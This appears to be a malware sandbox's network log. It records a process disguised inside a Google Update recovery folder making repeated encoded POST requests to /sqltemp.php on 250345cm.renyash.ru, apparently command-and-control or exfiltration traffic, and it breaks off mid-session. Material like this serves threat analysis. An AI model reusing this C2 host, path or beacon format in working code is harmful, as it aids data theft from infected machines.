                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3656fd8be187d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4597&min_rtt=1473&rtt_var=6801&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=55163&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  102 | 192.168.2.6 | 62741 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:28.329705000 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:28.688607931 CET | 1124 | OUT | Data Raw: 56 55 5f 54 54 51 51 52 58 56 52 59 56 5a 59 53 5b 5b 54 5d 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_TTQQRXVRYVZYS[[T]UZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0>",&%>?/>#[ _*:7W*> $?%B%,*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:28.776361942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:29.030249119 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bk1v5Yobxvq6pgmi96Ps%2FryGkIaF2wqV4MJ2qqhCd%2F7iuoLbhceLQgD1V9ial8vg%2Bdt0Tf82FW3kwHwjptADcvSmg7NAB1%2FaKlcDMOfFihGNtz7Rd%2BpXtz8jDdpru7MLpjiNDlvV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365748ea542d5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2586&min_rtt=1744&rtt_var=2339&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=172027&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  103 | 192.168.2.6 | 62742 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:29.162441969 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:29.516829014 CET | 1124 | OUT | Data Raw: 53 53 5f 5c 51 58 51 51 58 56 52 59 56 5d 59 56 5b 5a 54 59 55 5e 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_\QXQQXVRYV]YV[ZTYU^PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'-X#X3X;,)-R#[$**'T)$X7T3Y?(!B2/:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:29.606937885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:29.867603064 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQefpbUCx%2BbwYC3EAHckSHMvtmcpAaua2bIngCUHB8AG%2ByZ038xc0S6y2a0HpW0y08XH97l7j67E%2BfimslTWEWsq%2F7gmiFz2DJBK1bpzEY%2Bn3%2BUkUVubP4GmYnZsjR%2B66nCr1Zwo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36579cc0a41e0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1767&rtt_var=1102&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=414066&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  104 | 192.168.2.6 | 62743 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:29.985847950 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:30.344861031 CET | 1124 | OUT | Data Raw: 56 56 5f 53 51 5f 54 54 58 56 52 59 56 5a 59 53 5b 5e 54 5e 55 58 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_SQ_TTXVRYVZYS[^T^UXP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3?="/"$'E8W7=<_<9)-(\#+[(=2<::&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:30.429852009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:30.602660894 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mOwLQ3lRDU1nNmqU15UvqTpj1%2FBSxv9RvNXQy6R3BYlBoGRS4%2B%2FGpLZmk2JzQVMw8g%2FNH5oDEoTG5%2FCvwl5JCakY1H8TqZRXm2h%2B3hDq8dC1chkpRwdLGpHNShZIxldMD%2FhtaClC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3657eee460f9b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2549&min_rtt=1696&rtt_var=2343&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=171220&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  105 | 192.168.2.6 | 62744 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:30.721527100 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  106 | 192.168.2.6 | 62745 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:30.831120014 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:31.188606977 CET | 1964 | OUT | Data Raw: 53 54 5a 57 51 58 54 54 58 56 52 59 56 5b 59 50 5b 58 54 51 55 55 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: STZWQXTTXVRYV[YP[XTQUUPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[3,=#!]0> /*> [$(7>>?#2+(;%A2?#U9:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:31.271480083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:31.575083971 CET | 954 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sTPrcZdTH9RzEVpWsjACYQBYSselUe4SRII04qo4w9Y4RLKiIZW0J%2FrtCl64dvbj3ItuMsUgV1JSNwgsqod5chRMnuvzb%2BPcj9siX7SmqD9aDhjAmVI22txAm%2FjoQ8N3QKQhHvXo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36584294143bc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3003&min_rtt=1798&rtt_var=3085&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=127577&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 54 29 13 0c 1e 25 54 2c 1e 3c 04 33 57 31 58 31 00 29 28 0b 01 27 58 3c 02 3d 3a 3f 5b 21 3f 31 13 26 38 24 5f 23 3d 3b 5e 24 0e 2b 59 05 1c 23 18 21 3f 3c 12 29 13 38 06 26 01 26 02 30 3e 2f 05 28 01 2f 0c 34 15 01 10 24 2e 37 03 29 04 20 1e 24 3c 05 5b 39 06 2d 1f 30 00 2c 54 00 11 26 57 24 31 19 01 20 0e 3c 12 21 0f 13 1d 24 24 29 0e 32 3c 3f 16 37 17 3e 59 31 31 3f 59 22 55 3e 11 32 38 22 03 37 5b 2c 0b 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%T)%T,<3W1X1)('X<=:?[!?1&8$_#=;^$+Y#!?<)8&&0>/(/4$.7) $<[9-0,T&W$1 <!$$)2<?7>Y11?Y"U>28"7[,=.%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  107 | 192.168.2.6 | 62746 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:30.957109928 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:31.313563108 CET | 1124 | OUT | Data Raw: 56 56 5f 57 51 58 54 56 58 56 52 59 56 58 59 5e 5b 5a 54 50 55 55 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_WQXTVXVRYVXY^[ZTPUUP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3/64?'>@,:)R [8+90>'#!4(+*%Y<.&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:03:31.411168098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:31.664926052 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSZcddzbyyQzv%2Bd4osYnu5ZYwsAXExRv4QQjKVe%2Bg8VcIs3IwExBWTtq6SfJG0SJj7Uu2d1x7by20yb4qQ45gq4IN%2BTZd%2BkCn4T9Vr8nuKJQcCDLBBCYPCb%2BLRUficQY9t8NsL%2Fs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365850cfd4326-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5326&min_rtt=2474&rtt_var=6631&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57730&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  108 | 192.168.2.6 | 62747 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:31.783994913 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:32.141781092 CET | 1124 | OUT | Data Raw: 53 53 5a 57 51 5c 51 55 58 56 52 59 56 5e 59 56 5b 5a 54 5e 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZWQ\QUXVRYV^YV[ZT^U^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?*#?.3X#D;:&4Y**?W(.'!"3+;9D1/ ::&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:32.237021923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:32.431332111 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZuKBv0Aa61%2FiSQMdQvxb00avjUmd61pGNnmwZdq%2B9P4xXE9xux6G2cxnIM6QKVGNqbvWsiJP0XfJ06rkmDu2Xrd5ZBlvo9KmJa65D3fOvncFhzYucMw2UiIgl4bvou%2B%2B8sks1a2L"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3658a2c4d8c4b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5185&min_rtt=2040&rtt_var=7055&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=53676&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  109 | 192.168.2.6 | 62748 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:32.551105022 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:32.907444954 CET | 1124 | OUT | Data Raw: 56 56 5a 57 51 5b 54 52 58 56 52 59 56 50 59 54 5b 5c 54 5d 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VVZWQ[TRXVRYVPYT[\T]U^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['/:#/_$ 89= -3+4),Y# ?%??W,:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:33.023648024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:33.301673889 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VQKM2wyTEiLOtx689Lt8iKX71qOhnGfxakrGXJX%2BhZ1Y4zFlWpuuKGl3b2isCKvjpTAZyQB4etjcc50%2FjMXDyR27RxMqrujSpQPYarN1L3Jz7MAziz4IFxN7UdqqIydknEYTB43"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3658f1ed48c11-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4900&min_rtt=1955&rtt_var=6624&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57214&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  110 | 192.168.2.6 | 62749 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:33.425148964 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:33.782366991 CET | 1124 | OUT | Data Raw: 56 52 5f 53 51 5b 51 51 58 56 52 59 56 5a 59 52 5b 53 54 51 55 5c 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_SQ[QQXVRYVZYR[STQU\P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'4:'.9%4>?(:?*. !,?=28,:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:33.870084047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:34.124664068 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4IDWEAhM%2Bm1MrdNJBQ7iYVvBJKyKljMpkPIiQgU9cMUS7%2FPXnAZrDdZJGoW%2BU41Wp%2FNKQcU8m0wQ0p1e20ARpsHYX4iQps7vvPLL6YjY3sd5dOIvytyAi2Ka3HQxqhOMgf1k8uyG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365946bc08c5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2566&min_rtt=2030&rtt_var=1834&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=230866&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  111 | 192.168.2.6 | 62750 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:34.254590988 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
